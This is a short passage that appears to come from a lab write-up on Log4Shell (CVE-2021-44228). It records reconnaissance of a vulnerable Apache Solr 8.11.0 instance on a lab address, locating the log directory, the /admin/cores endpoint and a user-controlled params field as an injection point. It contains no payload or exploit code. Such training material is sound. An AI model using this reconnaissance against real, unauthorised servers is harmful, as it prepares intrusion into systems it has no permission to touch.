Discovery
This target machine is running Apache Solr 8.11.0, one example of software that is known to include this vulnerable log4j package.
I explored the web interface accessible at http://10.10.75.171:8983 and clicked around to get a feel for the application. For more detail on Apache Solr, please refer to their official website. https://solr.apache.org/
http://10.10.75.171:8983This instance of Apache Solr is provisioned with no data whatsoever. It is a flat, vanilla, and absolutely minimum installation -- yet at its core it is still vulnerable to this CVE-2021-44228.
When navigating to http://10.10.75.171:8983. I could see clear indicators that log4j is in use within the application for logging activity. The -Dsolr.log.dir argument was set to, /var/solr/logs
The path/ URL endpoint that is indicated in these repeat entries are - /admin/cores
I also gathered from these log entries that there are some datapoints I could control as a user. Params={} field gave that away.
Last updated